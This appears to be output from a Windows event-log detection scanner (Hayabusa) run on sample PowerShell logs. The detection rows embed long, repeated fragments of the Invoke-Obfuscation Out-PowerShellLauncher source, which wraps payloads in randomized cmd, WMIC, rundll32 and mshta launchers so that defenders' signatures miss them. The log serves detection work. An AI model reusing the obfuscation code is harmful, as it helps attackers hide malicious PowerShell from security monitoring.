If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. $PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. $System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. $PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. $CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. $System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. $PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. $CharCastDoubleQuote = 